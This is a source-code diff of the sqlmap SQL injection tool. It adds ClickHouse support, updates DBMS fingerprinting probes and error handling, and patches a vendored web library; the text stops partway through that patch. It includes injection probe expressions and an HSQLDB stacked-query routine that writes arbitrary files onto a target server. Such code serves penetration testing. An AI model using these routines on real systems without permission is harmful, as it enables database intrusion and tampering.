@@ -58,6 +58,8 @@ def checkDependencies():
|
||||
__import__("mimerpy")
|
||||
elif dbmsName == DBMS.CUBRID:
|
||||
__import__("CUBRIDdb")
|
||||
elif dbmsName == DBMS.CLICKHOUSE:
|
||||
__import__("clickhouse_connect")
|
||||
except:
|
||||
warnMsg = "sqlmap requires '%s' third-party library " % data[1]
|
||||
warnMsg += "in order to directly connect to the DBMS "
|
||||
|
||||
30
plugins/dbms/clickhouse/__init__.py
Executable file
30
plugins/dbms/clickhouse/__init__.py
Executable file
@@ -0,0 +1,30 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.settings import CLICKHOUSE_SYSTEM_DBS
|
||||
from lib.core.unescaper import unescaper
|
||||
|
||||
from plugins.dbms.clickhouse.enumeration import Enumeration
|
||||
from plugins.dbms.clickhouse.filesystem import Filesystem
|
||||
from plugins.dbms.clickhouse.fingerprint import Fingerprint
|
||||
from plugins.dbms.clickhouse.syntax import Syntax
|
||||
from plugins.dbms.clickhouse.takeover import Takeover
|
||||
from plugins.generic.misc import Miscellaneous
|
||||
|
||||
class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
||||
"""
|
||||
This class defines ClickHouse methods
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.excludeDbsList = CLICKHOUSE_SYSTEM_DBS
|
||||
|
||||
for cls in self.__class__.__bases__:
|
||||
cls.__init__(self)
|
||||
|
||||
unescaper[DBMS.CLICKHOUSE] = Syntax.escape
|
||||
11
plugins/dbms/clickhouse/connector.py
Executable file
11
plugins/dbms/clickhouse/connector.py
Executable file
@@ -0,0 +1,11 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from plugins.generic.connector import Connector as GenericConnector
|
||||
|
||||
class Connector(GenericConnector):
|
||||
pass
|
||||
22
plugins/dbms/clickhouse/enumeration.py
Executable file
22
plugins/dbms/clickhouse/enumeration.py
Executable file
@@ -0,0 +1,22 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.data import logger
|
||||
from plugins.generic.enumeration import Enumeration as GenericEnumeration
|
||||
|
||||
class Enumeration(GenericEnumeration):
|
||||
def getPasswordHashes(self):
|
||||
warnMsg = "on ClickHouse it is not possible to enumerate the user password hashes"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return {}
|
||||
|
||||
def getRoles(self, *args, **kwargs):
|
||||
warnMsg = "on ClickHouse it is not possible to enumerate the user roles"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return {}
|
||||
18
plugins/dbms/clickhouse/filesystem.py
Executable file
18
plugins/dbms/clickhouse/filesystem.py
Executable file
@@ -0,0 +1,18 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||
|
||||
class Filesystem(GenericFilesystem):
|
||||
def readFile(self, remoteFile):
|
||||
errMsg = "on ClickHouse it is not possible to read files"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||
errMsg = "on ClickHouse it is not possible to write files"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
91
plugins/dbms/clickhouse/fingerprint.py
Executable file
91
plugins/dbms/clickhouse/fingerprint.py
Executable file
@@ -0,0 +1,91 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import Format
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.session import setDbms
|
||||
from lib.core.settings import CLICKHOUSE_ALIASES
|
||||
from lib.request import inject
|
||||
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
|
||||
|
||||
class Fingerprint(GenericFingerprint):
|
||||
def __init__(self):
|
||||
GenericFingerprint.__init__(self, DBMS.CLICKHOUSE)
|
||||
|
||||
def getFingerprint(self):
|
||||
value = ""
|
||||
wsOsFp = Format.getOs("web server", kb.headersFp)
|
||||
|
||||
if wsOsFp:
|
||||
value += "%s\n" % wsOsFp
|
||||
|
||||
if kb.data.banner:
|
||||
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
|
||||
|
||||
if dbmsOsFp:
|
||||
value += "%s\n" % dbmsOsFp
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += DBMS.CLICKHOUSE
|
||||
return value
|
||||
|
||||
actVer = Format.getDbms()
|
||||
blank = " " * 15
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if kb.bannerFp:
|
||||
banVer = kb.bannerFp.get("dbmsVersion")
|
||||
|
||||
if banVer:
|
||||
banVer = Format.getDbms([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
htmlErrorFp = Format.getErrorParsedDBMSes()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
return value
|
||||
|
||||
def checkDbms(self):
|
||||
if not conf.extensiveFp and Backend.isDbmsWithin(CLICKHOUSE_ALIASES):
|
||||
setDbms(DBMS.CLICKHOUSE)
|
||||
|
||||
self.getBanner()
|
||||
|
||||
return True
|
||||
|
||||
infoMsg = "testing %s" % DBMS.CLICKHOUSE
|
||||
logger.info(infoMsg)
|
||||
|
||||
result = inject.checkBooleanExpression("halfMD5('abcd')='16356072519128051347'")
|
||||
|
||||
if result:
|
||||
infoMsg = "confirming %s" % DBMS.CLICKHOUSE
|
||||
logger.info(infoMsg)
|
||||
result = inject.checkBooleanExpression("generateUUIDv4(1)!=generateUUIDv4(2)")
|
||||
|
||||
if not result:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
setDbms(DBMS.CLICKHOUSE)
|
||||
self.getBanner()
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
22
plugins/dbms/clickhouse/syntax.py
Executable file
22
plugins/dbms/clickhouse/syntax.py
Executable file
@@ -0,0 +1,22 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.convert import getOrds
|
||||
from plugins.generic.syntax import Syntax as GenericSyntax
|
||||
|
||||
class Syntax(GenericSyntax):
|
||||
@staticmethod
|
||||
def escape(expression, quote=True):
|
||||
"""
|
||||
>>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT char(97)||char(98)||char(99)||char(100)||char(101)||char(102)||char(103)||char(104) FROM foobar"
|
||||
True
|
||||
"""
|
||||
|
||||
def escaper(value):
|
||||
return "||".join("char(%d)" % _ for _ in getOrds(value))
|
||||
|
||||
return Syntax._escape(expression, quote, escaper)
|
||||
28
plugins/dbms/clickhouse/takeover.py
Executable file
28
plugins/dbms/clickhouse/takeover.py
Executable file
@@ -0,0 +1,28 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||
from plugins.generic.takeover import Takeover as GenericTakeover
|
||||
|
||||
class Takeover(GenericTakeover):
|
||||
def osCmd(self):
|
||||
errMsg = "on ClickHouse it is not possible to execute commands"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osShell(self):
|
||||
errMsg = "on ClickHouse it is not possible to execute commands"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osPwn(self):
|
||||
errMsg = "on ClickHouse it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osSmb(self):
|
||||
errMsg = "on ClickHouse it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
@@ -68,7 +68,7 @@ class Fingerprint(GenericFingerprint):
|
||||
infoMsg = "testing %s" % DBMS.DERBY
|
||||
logger.info(infoMsg)
|
||||
|
||||
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 {LIMIT 1 OFFSET 0})")
|
||||
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 OFFSET 0 ROWS FETCH FIRST 1 ROW ONLY)")
|
||||
|
||||
if result:
|
||||
infoMsg = "confirming %s" % DBMS.DERBY
|
||||
|
||||
@@ -87,7 +87,7 @@ class Fingerprint(GenericFingerprint):
|
||||
infoMsg = "testing %s" % DBMS.H2
|
||||
logger.info(infoMsg)
|
||||
|
||||
result = inject.checkBooleanExpression("ZERO() IS 0")
|
||||
result = inject.checkBooleanExpression("ZERO()=0")
|
||||
|
||||
if result:
|
||||
infoMsg = "confirming %s" % DBMS.H2
|
||||
|
||||
@@ -21,13 +21,13 @@ class Filesystem(GenericFilesystem):
|
||||
|
||||
@stackedmethod
|
||||
def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||
funcName = randomStr()
|
||||
func_name = randomStr()
|
||||
max_bytes = 1024 * 1024
|
||||
|
||||
debugMsg = "creating JLP procedure '%s'" % funcName
|
||||
debugMsg = "creating JLP procedure '%s'" % func_name
|
||||
logger.debug(debugMsg)
|
||||
|
||||
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes)
|
||||
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (func_name, max_bytes)
|
||||
addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
|
||||
addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
|
||||
inject.goStacked(addFuncQuery)
|
||||
@@ -47,11 +47,12 @@ class Filesystem(GenericFilesystem):
|
||||
logger.debug(debugMsg)
|
||||
|
||||
# Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
|
||||
invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes)
|
||||
invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (func_name, remoteFile, fcEncodedStr, max_bytes)
|
||||
inject.goStacked(invokeQuery)
|
||||
|
||||
logger.debug("cleaning up" % funcName)
|
||||
delQuery = "DELETE PROCEDURE %s" % funcName
|
||||
logger.debug("cleaning up the database management system")
|
||||
|
||||
delQuery = "DELETE PROCEDURE %s" % func_name
|
||||
inject.goStacked(delQuery)
|
||||
|
||||
message = "the local file '%s' has been written on the back-end DBMS" % localFile
|
||||
|
||||
@@ -45,13 +45,13 @@ class Fingerprint(GenericFingerprint):
|
||||
# Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/
|
||||
|
||||
versions = (
|
||||
(80000, 80029), # MySQL 8.0
|
||||
(80000, 80033), # MySQL 8.0
|
||||
(60000, 60014), # MySQL 6.0
|
||||
(50700, 50739), # MySQL 5.7
|
||||
(50700, 50742), # MySQL 5.7
|
||||
(50600, 50652), # MySQL 5.6
|
||||
(50500, 50563), # MySQL 5.5
|
||||
(50400, 50404), # MySQL 5.4
|
||||
(50100, 50175), # MySQL 5.1
|
||||
(50100, 50174), # MySQL 5.1
|
||||
(50000, 50097), # MySQL 5.0
|
||||
(40100, 40131), # MySQL 4.1
|
||||
(40000, 40032), # MySQL 4.0
|
||||
@@ -175,7 +175,7 @@ class Fingerprint(GenericFingerprint):
|
||||
infoMsg = "testing %s" % DBMS.MYSQL
|
||||
logger.info(infoMsg)
|
||||
|
||||
result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL")
|
||||
result = inject.checkBooleanExpression("QUARTER(NULL XOR NULL) IS NULL")
|
||||
|
||||
if result:
|
||||
infoMsg = "confirming %s" % DBMS.MYSQL
|
||||
|
||||
@@ -131,7 +131,9 @@ class Fingerprint(GenericFingerprint):
|
||||
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
|
||||
logger.info(infoMsg)
|
||||
|
||||
if inject.checkBooleanExpression("BIT_COUNT(NULL) IS NULL"):
|
||||
if inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"):
|
||||
Backend.setVersion(">= 15.0")
|
||||
elif inject.checkBooleanExpression("BIT_COUNT(NULL) IS NULL"):
|
||||
Backend.setVersion(">= 14.0")
|
||||
elif inject.checkBooleanExpression("GEN_RANDOM_UUID() IS NOT NULL"):
|
||||
Backend.setVersion(">= 13.0")
|
||||
|
||||
@@ -83,7 +83,7 @@ class Databases(object):
|
||||
if not kb.data.currentDb and Backend.isDbms(DBMS.VERTICA):
|
||||
kb.data.currentDb = VERTICA_DEFAULT_SCHEMA
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.CLICKHOUSE):
|
||||
warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms()
|
||||
warnMsg += "schema names for enumeration as the counterpart to database "
|
||||
warnMsg += "names on other DBMSes"
|
||||
@@ -108,7 +108,7 @@ class Databases(object):
|
||||
warnMsg += "names will be fetched from 'mysql' database"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.CLICKHOUSE):
|
||||
warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms()
|
||||
warnMsg += "for enumeration as the counterpart to database "
|
||||
warnMsg += "names on other DBMSes"
|
||||
@@ -621,7 +621,7 @@ class Databases(object):
|
||||
condQueryStr = "%%s%s" % colCondParam
|
||||
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
|
||||
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
||||
query += condQuery
|
||||
|
||||
@@ -757,7 +757,7 @@ class Databases(object):
|
||||
condQueryStr = "%%s%s" % colCondParam
|
||||
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
|
||||
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
||||
query += condQuery
|
||||
|
||||
@@ -838,7 +838,7 @@ class Databases(object):
|
||||
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||
query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery)
|
||||
field = None
|
||||
elif Backend.isDbms(DBMS.MONETDB):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MONETDB, DBMS.CLICKHOUSE):
|
||||
query = safeStringFormat(rootQuery.blind.query, (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), index))
|
||||
field = None
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE):
|
||||
@@ -880,7 +880,7 @@ class Databases(object):
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if not onlyColNames:
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
|
||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
|
||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||
|
||||
@@ -239,7 +239,7 @@ class Entries(object):
|
||||
entries = BigArray(_zip(*[entries[colName] for colName in colList]))
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
@@ -408,7 +408,7 @@ class Entries(object):
|
||||
if column not in entries:
|
||||
entries[column] = BigArray()
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE):
|
||||
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
|
||||
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
|
||||
|
||||
@@ -222,13 +222,13 @@ class Filesystem(object):
|
||||
|
||||
if conf.direct or isStackingAvailable():
|
||||
if isStackingAvailable():
|
||||
debugMsg = "going to read the file with stacked query SQL "
|
||||
debugMsg = "going to try to read the file with stacked query SQL "
|
||||
debugMsg += "injection technique"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
fileContent = self.stackedReadFile(remoteFile)
|
||||
elif Backend.isDbms(DBMS.MYSQL):
|
||||
debugMsg = "going to read the file with a non-stacked query "
|
||||
debugMsg = "going to try to read the file with non-stacked query "
|
||||
debugMsg += "SQL injection technique"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
|
||||
14
sqlmap.py
14
sqlmap.py
@@ -436,6 +436,11 @@ def main():
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif any(_ in errMsg for _ in (": 9.9.9#",)):
|
||||
errMsg = "LOL :)"
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif kb.get("dumpKeyboardInterrupt"):
|
||||
raise SystemExit
|
||||
|
||||
@@ -457,7 +462,7 @@ def main():
|
||||
dataToStdout(excMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")):
|
||||
elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "<built-in function compile> returned NULL without setting an exception", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")):
|
||||
errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
@@ -467,6 +472,11 @@ def main():
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif all(_ in excMsg for _ in ("FileNotFoundError: [Errno 2] No such file or directory", "cwd = os.getcwd()")):
|
||||
errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif all(_ in excMsg for _ in ("PermissionError: [WinError 5]", "multiprocessing")):
|
||||
errMsg = "there is a permission problem in running multiprocessing on this system. "
|
||||
errMsg += "Please rerun with '--disable-multi'"
|
||||
@@ -543,7 +553,7 @@ def main():
|
||||
finally:
|
||||
kb.threadContinue = False
|
||||
|
||||
if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS:
|
||||
if (getDaysFromLastUpdate() or 0) > LAST_UPDATE_NAGGING_DAYS:
|
||||
warnMsg = "your sqlmap version is outdated"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
|
||||
80
thirdparty/bottle/bottle.py
vendored
80
thirdparty/bottle/bottle.py
vendored
@@ -69,12 +69,12 @@ if __name__ == '__main__':
|
||||
# Imports and Python 2/3 unification ##########################################
|
||||
###############################################################################
|
||||
|
||||
import base64, calendar, cgi, email.utils, functools, hmac, imp, itertools,\
|
||||
import base64, calendar, cgi, email.utils, functools, hmac, itertools,\
|
||||
mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib
|
||||
|
||||
from types import FunctionType
|
||||
from datetime import date as datedate, datetime, timedelta
|
||||
from tempfile import TemporaryFile
|
||||
from tempfile import NamedTemporaryFile
|
||||
from traceback import format_exc, print_exc
|
||||
from unicodedata import normalize
|
||||
|
||||
@@ -83,34 +83,6 @@ try:
|
||||
except ImportError:
|
||||
from json import dumps as json_dumps, loads as json_lds
|
||||
|
||||
# inspect.getargspec was removed in Python 3.6, use
|
||||
# Signature-based version where we can (Python 3.3+)
|
||||
try:
|
||||
from inspect import signature
|
||||
def getargspec(func):
|
||||
params = signature(func).parameters
|
||||
args, varargs, keywords, defaults = [], None, None, []
|
||||
for name, param in params.items():
|
||||
if param.kind == param.VAR_POSITIONAL:
|
||||
varargs = name
|
||||
elif param.kind == param.VAR_KEYWORD:
|
||||
keywords = name
|
||||
else:
|
||||
args.append(name)
|
||||
if param.default is not param.empty:
|
||||
defaults.append(param.default)
|
||||
return (args, varargs, keywords, tuple(defaults) or None)
|
||||
except ImportError:
|
||||
try:
|
||||
from inspect import getfullargspec
|
||||
def getargspec(func):
|
||||
spec = getfullargspec(func)
|
||||
kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
|
||||
return kwargs, spec[1], spec[2], spec[3]
|
||||
except ImportError:
|
||||
from inspect import getargspec
|
||||
|
||||
|
||||
py = sys.version_info
|
||||
py3k = py.major > 2
|
||||
|
||||
@@ -123,9 +95,17 @@ if py3k:
|
||||
urlunquote = functools.partial(urlunquote, encoding='latin1')
|
||||
from http.cookies import SimpleCookie, Morsel, CookieError
|
||||
from collections.abc import MutableMapping as DictMixin
|
||||
from types import ModuleType as new_module
|
||||
import pickle
|
||||
from io import BytesIO
|
||||
import configparser
|
||||
# getfullargspec was deprecated in 3.5 and un-deprecated in 3.6
|
||||
# getargspec was deprecated in 3.0 and removed in 3.11
|
||||
from inspect import getfullargspec
|
||||
def getargspec(func):
|
||||
spec = getfullargspec(func)
|
||||
kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
|
||||
return kwargs, spec[1], spec[2], spec[3]
|
||||
|
||||
basestring = str
|
||||
unicode = str
|
||||
@@ -143,9 +123,12 @@ else: # 2.x
|
||||
from Cookie import SimpleCookie, Morsel, CookieError
|
||||
from itertools import imap
|
||||
import cPickle as pickle
|
||||
from imp import new_module
|
||||
from StringIO import StringIO as BytesIO
|
||||
import ConfigParser as configparser
|
||||
from collections import MutableMapping as DictMixin
|
||||
from inspect import getargspec
|
||||
|
||||
unicode = unicode
|
||||
json_loads = json_lds
|
||||
exec(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))
|
||||
@@ -256,6 +239,7 @@ class lazy_attribute(object):
|
||||
setattr(cls, self.__name__, value)
|
||||
return value
|
||||
|
||||
|
||||
###############################################################################
|
||||
# Exceptions and Events #######################################################
|
||||
###############################################################################
|
||||
@@ -1353,7 +1337,7 @@ class BaseRequest(object):
|
||||
body.write(part)
|
||||
body_size += len(part)
|
||||
if not is_temp_file and body_size > self.MEMFILE_MAX:
|
||||
body, tmp = TemporaryFile(mode='w+b'), body
|
||||
body, tmp = NamedTemporaryFile(mode='w+b'), body
|
||||
body.write(tmp.getvalue())
|
||||
del tmp
|
||||
is_temp_file = True
|
||||
@@ -2010,6 +1994,7 @@ class JSONPlugin(object):
|
||||
dumps = self.json_dumps
|
||||
if not self.json_dumps: return callback
|
||||
|
||||
@functools.wraps(callback)
|
||||
def wrapper(*a, **ka):
|
||||
try:
|
||||
rv = callback(*a, **ka)
|
||||
@@ -2057,7 +2042,7 @@ class _ImportRedirect(object):
|
||||
""" Create a virtual package that redirects imports (see PEP 302). """
|
||||
self.name = name
|
||||
self.impmask = impmask
|
||||
self.module = sys.modules.setdefault(name, imp.new_module(name))
|
||||
self.module = sys.modules.setdefault(name, new_module(name))
|
||||
self.module.__dict__.update({
|
||||
'__file__': __file__,
|
||||
'__path__': [],
|
||||
@@ -2066,10 +2051,15 @@ class _ImportRedirect(object):
|
||||
})
|
||||
sys.meta_path.append(self)
|
||||
|
||||
def find_spec(self, fullname, path, target=None):
|
||||
if '.' not in fullname: return
|
||||
if fullname.rsplit('.', 1)[0] != self.name: return
|
||||
from importlib.util import spec_from_loader
|
||||
return spec_from_loader(fullname, self)
|
||||
|
||||
def find_module(self, fullname, path=None):
|
||||
if '.' not in fullname: return
|
||||
